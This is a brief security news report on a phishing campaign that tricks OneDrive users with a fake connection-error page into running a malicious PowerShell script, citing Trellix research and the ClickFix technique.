Microsoft OneDrive users in the U.S., South Korea, India, Germany, Ireland, Norway, Italy and the UK have been tricked into running a malicious PowerShell script compromising their systems. The script is part of the OneDrive Pastejacking phishing and downloader attack campaign, The Hacker News reports.
Intrusions commence with the delivery of phishing emails with an HTML file, which, when clicked, prompts a OneDrive connection failure notice that includes "How to fix" and "Details" options, according to a Trellix analysis.
Targets clicking "How to fix" would be prompted to perform several procedures that result in the execution of ipconfig /flushdns and the creation of a 'downloads' folder on the C drive, where an archive file would be downloaded.
Such an archive file would then be renamed and have its contents extracted before script execution, said Trellix security researcher Rafael Pena. Proofpoint, ReliaQuest and McAfee previously reported similar phishing campaigns leveraging the ClickFix attack technique.
